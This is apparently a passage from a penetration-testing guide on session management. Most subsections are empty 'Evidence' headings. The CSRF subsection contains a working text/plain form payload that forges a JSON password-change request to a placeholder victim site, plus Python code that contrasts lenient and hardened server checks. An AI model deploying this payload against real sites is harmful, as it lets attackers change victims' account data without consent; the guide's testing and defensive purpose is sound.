The Pentesting Guide

4.6 Session Management Testing

4.6.1 Testing for Session Management Schema

Evidence:

4.6.2 Testing for Cookies Attributes

Evidence:

4.6.3 Testing for Session Fixation

Evidence:

4.6.4 Testing for Exposed Session Variables

Evidence:

4.6.5 Testing for Cross Site Request Forgery

To deliver a JSON body from a cross-site HTML form, we have to change the form's encoding type (enctype) to text/plain: the browser then sends the field as a raw name=value pair with no URL-encoding, so the JSON fragments placed in the name and value attributes arrive as-is.

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <!-- enctype text/plain: the request body becomes "<name>=<value>" with no URL-encoding -->
    <form action='http://victimsite.com' method='POST' enctype='text/plain'>
      <!-- the JSON is split across name and value; the '=' the browser inserts lands inside the "padding" string -->
      <input type='hidden' name='{"name":"hacked","password":"hacked","padding":"' value='something"}' />
      <input type='submit' value='Submit request' />
    </form>
  </body>
</html>
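As an added example (not code from the original page), the following Python reconstructs the body a browser sends for the form above and contrasts an endpoint that parses any body with one that applies the checks a JSON endpoint should enforce before parsing; the attacker origin, the function names and the sample credentials are constructed for illustration.

```python
import json
from urllib.parse import urlsplit

# Constructed from the page's form: the name attribute carries the JSON prefix
# and the value attribute the tail; the '=' a text/plain form inserts between
# them lands inside the "padding" string, so the body is still valid JSON.
FORM_NAME = '{"name":"hacked","password":"hacked","padding":"'
FORM_VALUE = 'something"}'
APP_ORIGIN = "http://victimsite.com"         # origin of the page's form action
ATTACKER_ORIGIN = "http://attacker.example"  # placeholder cross-site origin

def text_plain_body(name, value):
    """Body a browser builds for one text/plain form field:
    name=value with no URL-encoding, terminated by CRLF."""
    return f"{name}={value}\r\n"

def lenient_parse(body):
    """A careless JSON endpoint: parses whatever arrives, whatever the
    Content-Type says. The forged form body parses cleanly."""
    return json.loads(body)

def hardened_check(headers, body, app_origin=APP_ORIGIN):
    """Checks a JSON endpoint should apply before parsing; returns
    (accepted, reason). An HTML form cannot send application/json, and a
    cross-site POST carries an Origin header the attacker page cannot set.
    Pair this with a per-session CSRF token and SameSite cookies."""
    ctype = headers.get("Content-Type", "").split(";")[0].strip().lower()
    if ctype != "application/json":
        return False, f"rejected: Content-Type {ctype or '<none>'}"
    origin = headers.get("Origin") or headers.get("Referer", "")
    if urlsplit(origin).netloc != urlsplit(app_origin).netloc:
        return False, f"rejected: cross-site origin {origin or '<none>'}"
    try:
        json.loads(body)
    except json.JSONDecodeError as exc:
        return False, f"rejected: malformed JSON ({exc.msg})"
    return True, "accepted"

def forged_request():
    """Headers and body as the page's form would send them (constructed)."""
    headers = {"Content-Type": "text/plain", "Origin": ATTACKER_ORIGIN}
    return headers, text_plain_body(FORM_NAME, FORM_VALUE)

def legitimate_request():
    """Same-origin fetch() call with a real JSON body (constructed)."""
    headers = {"Content-Type": "application/json; charset=utf-8",
               "Origin": APP_ORIGIN}
    return headers, json.dumps({"name": "alice", "password": "s3cret"})
```

Running lenient_parse on the forged body returns the attacker's object with "padding" set to "=something", while hardened_check rejects the same request on its Content-Type alone.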

Evidence:

4.6.6 Testing for Logout Functionality

Evidence:

4.6.7 Testing Session Timeout

Evidence:

4.6.8 Testing for Session Puzzling

This vulnerability occurs when an application uses the same session variable for more than one purpose. An attacker can potentially access pages in an order unanticipated by the developers so that the session variable is set in one context and then used in another.

Evidence:

4.6.9 Testing for Session Hijacking

Evidence:

4.6.10 Testing JSON Web Tokens

Evidence:

4.6.11 Testing for Concurrent Sessions

Evidence:
